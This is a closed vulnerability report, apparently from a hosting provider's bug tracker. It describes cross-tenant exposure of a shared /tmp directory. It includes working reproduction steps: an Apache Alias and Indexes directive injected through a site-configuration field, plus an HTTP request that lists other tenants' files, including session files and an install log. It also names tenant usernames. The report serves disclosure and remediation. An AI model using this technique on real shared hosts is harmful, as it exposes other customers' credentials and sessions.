Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by subhash - 12.07.2026
Last edited by cbay - 13.07.2026

FS#393 - Cross-Tenant Data Exposure via Shared /tmp Directory — FS#363 Regression

## Summary

The shared hosting server `http21` uses a world-readable `/tmp` directory shared across all tenants. Using the Apache `Alias` + `Options +Indexes` directive injection, I listed `/tmp` contents and observed files belonging to other tenants — including Java performance data directories named after their usernames, ERP installation logs, and evidence that another researcher achieved root-level access on this server (`proof.txt`, `impact.txt`).

Relationship to  FS#363  :  FS#363  ("Cross-tenant File Disclosure via World-Readable /tmp") was marked Fixed. This report demonstrates the fix is incomplete — `/tmp` is still shared and world-readable across tenants on server `http21`.

## Environment

Detail Value
——– ——-
Account subhash (ID 486630)
Site subhash.alwaysdata.net (ID 1058919)
Server http21 (Debian 12, shared hosting)
## Steps to Reproduce

### Step 1 — Inject Alias directive pointing to /tmp

Add to the "Additional Apache directives" field on the site configuration page:

```apache
Alias /tmp-listing /tmp
<Directory /tmp>

Require all granted
Options +Indexes

</Directory>
```

### Step 2 — List /tmp contents (cross-tenant files visible)

After Apache reload:

```http
GET /tmp-listing/ HTTP/1.1
Host: subhash.alwaysdata.net
```

Response: Apache directory listing showing files from multiple tenants:

```
Index of /tmp-listing

Name Last modified Size
─────────────────────────────────────────────────────────
hsperfdata_kalamtech/ 2026-07-12 … -
hsperfdata_ziiino/ 2026-07-12 … -
dolibarr_install.log 2026-07-10 … 14K
impact.txt 2026-06-xx … -
proof.txt 2026-06-xx … -
sess_* 2026-07-xx … -
systemd-private-*/ 2026-07-xx … -
```

### Step 3 — Identify cross-tenant data

File/Directory Owner (tenant) Data Exposed
—————- ————— ————-
`hsperfdata_kalamtech/` kalamtech Java performance monitoring data — reveals this tenant runs Java applications
`hsperfdata_ziiino/` ziiino Java performance monitoring data — reveals another Java tenant
`dolibarr_install.log` Unknown tenant Dolibarr ERP installation log — likely contains database credentials, admin passwords set during install
`proof.txt` Previous researcher Evidence of prior root compromise — another researcher has already demonstrated full server access
`impact.txt` Previous researcher Impact documentation from prior compromise
`sess_*` Various PHP session files — session data from multiple tenants
### Step 4 — Cleanup

The Alias directive was immediately removed.

##  FS#363  Regression Evidence

 FS#363  was reported as "Cross-tenant File Disclosure via World-Readable /tmp" and marked Fixed. The fix appears incomplete because:

1. `/tmp` is still a shared directory across all tenants on http21
2. Files from multiple tenants (kalamtech, ziiino, unknown Dolibarr user) are visible
3. The `hsperfdata_*` directories are created by Java with world-readable permissions
4. PHP session files (`sess_*`) are in the shared `/tmp`
5. The previous researcher's `proof.txt` and `impact.txt` files remain in `/tmp`

The proper fix requires per-tenant `/tmp` isolation via `PrivateTmp=yes` in systemd units, mount namespaces, or per-user `/tmp` directories (e.g., `/tmp/user/{account}/`).

## Impact

1. Cross-tenant username enumeration: Directory names like `hsperfdata_kalamtech` reveal other tenants' account usernames
2. Application stack fingerprinting: `hsperfdata_*` reveals which tenants run Java; `sess_*` reveals PHP usage
3. Credential exposure: ERP installation logs (like `dolibarr_install.log`) commonly contain database credentials set during setup
4. Session hijacking risk: Shared PHP session files in `/tmp` means one tenant could potentially read another's session data
5. Evidence of prior compromise: The `proof.txt` and `impact.txt` files indicate another researcher achieved root access on this server — the attack surface is proven

## Suggested Fix

1. Per-tenant `/tmp` isolation: Use `PrivateTmp=yes` in systemd service units, or implement mount namespaces to give each tenant their own `/tmp`
2. Restrict `/tmp` permissions: Set sticky bit (should already exist) and enforce `umask 077` for all tenant processes
3. Clean up stale files: Remove `proof.txt`, `impact.txt`, and stale session/temp files from `/tmp`

Thanks

Closed by  cbay
13.07.2026 07:48
Reason for closing:  Duplicate
Additional comments about closing:  

https://security.alwaysda ta.com/task/389

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing